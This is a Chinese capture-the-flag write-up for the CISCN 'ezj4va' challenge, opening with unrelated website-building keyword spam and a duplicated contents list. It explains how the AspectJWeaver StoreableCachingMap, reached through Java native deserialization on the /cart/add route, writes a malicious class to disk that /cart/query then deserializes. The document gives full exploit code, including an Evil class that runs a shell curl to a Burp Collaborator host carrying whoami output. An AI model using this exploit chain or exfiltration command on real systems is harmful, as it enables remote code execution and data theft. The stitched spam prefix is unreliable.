辽宁市场网站建设销售,网站选服务器文件,商标购买网站,广西网站制作公司目录
前言
原理分析
step 0
step 1
EXP 前文#xff1a;【Web】浅聊Java反序列化之AspectJWeaver——任意文件写入-CSDN博客
前言
这就是当年传说中的零解题嘛#x1f62d;#xff0c;快做#x1f92e;了
有了之前的经验#xff0c;思路顺挺快的#xff0c;中间不…目录
前言
原理分析
step 0
step 1
EXP 前文【Web】浅聊Java反序列化之AspectJWeaver——任意文件写入-CSDN博客
前言
这就是当年传说中的零解题嘛快做了
有了之前的经验思路顺挺快的中间不知道为啥一直一直一直一直报错耗了一个下午总算打通
考的是AspectJWeaver写恶意字节码到靶机上(本题jsp靶机不解析)再去对其进行反序列化
值得一提的是本题并未在输入流进行黑名单过滤事实上就是纯粹的原生反序列化但因该jdk下无利用链可打所以只能先迂回写入一个恶意类再对这个恶意类进行反序列化操作实在是巧思 原理分析
step 0
先看pom依赖 当时是2021年Y4还没有公开fj原生反序列化的姿势所以可以排除(
自然关注的重点会落在AspectJWeaver上其可以实现任意文件写入(具体细节请看最开始给的文章不作赘述)
问题是文章里给的姿势是利用CC依赖下LazyMap#get触发StoreableCachingMap#put从而写文件的题目没有给CC依赖怎么破呢
自然是要去利用题目自定义的类的哇这里暂按下不表 此外拿到源码后我们知晓了靶机的目录结构方便我们后续利用 step 1
再来看路由
/cart/add
接受skus和cart两个参数然后作为入参调用cartService.addToCart
addToCart方法就是对传入数据分别进行原生反序列化将cart的SkuDescribe属性作为Map将toAdd的SkuDescibe属性作为entry并分别取其K V对put进Map中
如果令Map为精心构造folder属性的StoreableCachingMapK V分别为恶意文件名和恶意字节码文件内容的话我们就可以在靶机写入任意恶意字节码文件属实太妙了(具体请看EXP构造) 再看/cart/query路由
对由cookie传入的cart值进行cartService#query操作 这里其实就是直接进行反序列化操作了但题目的jdk下并没有原生反序列化的链子所以我们无法直接进行利用只能多走一步去反序列化我们写入的恶意类 思路并不复杂话休絮烦直接给EXP EXP
EXP.java
package ciscn.fina1.ezj4va;import ciscn.fina1.ezj4va.domain.Cart;
import ciscn.fina1.ezj4va.utils.Serializer;
import javassist.ClassPool;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.HashMap;public class Exp {protected static String getSkus() {try {Cart cart new Cart();Field sku_f cart.getClass().getDeclaredField(skuDescribe);sku_f.setAccessible(true);HashMap hashMap new HashMap();String bytes Base64.getEncoder().encodeToString(ClassPool.getDefault().get(Evil.class.getName()).toBytecode());hashMap.put(Evil.class, Base64.getDecoder().decode(bytes));sku_f.set(cart, hashMap);return Serializer.serialize(cart);} catch (Exception e) {e.printStackTrace();}return ;}protected static String getOldCart() {try {Cart cart new Cart();Field sku_f cart.getClass().getDeclaredField(skuDescribe);sku_f.setAccessible(true);Class clazz Class.forName(org.aspectj.weaver.tools.cache.SimpleCache$StoreableCachingMap);Constructor constructor clazz.getDeclaredConstructors()[0];constructor.setAccessible(true);Object o constructor.newInstance(/ctf/ezj4va/app/target/classes/ciscn/fina1/ezj4va, 1);sku_f.set(cart, o);return Serializer.serialize(cart);} catch (Exception e) {e.printStackTrace();}return ;}public static void main(String[] args) throws Exception {String oldCartStr getOldCart();String skus getSkus();Evil evil new Evil();System.out.println(oldCartStr);System.out.println(skus);System.out.println(Serializer.serialize(evil));}
}Evil.java
package ciscn.fina1.ezj4va;import java.io.Serializable;public class Evil implements Serializable {private void readObject(java.io.ObjectInputStream s) throws Exception{Runtime.getRuntime().exec(new String[]{/bin/sh,-c,curl http://lpe59sb790s5tlrgmet6za2aj1psdh.burpcollaborator.net?awhoami});}
}
先访问/cart/add写入恶意字节码文件 再访问/cart/query来反序列化利用写入的恶意类 用bp起一个dnslog来外带数据
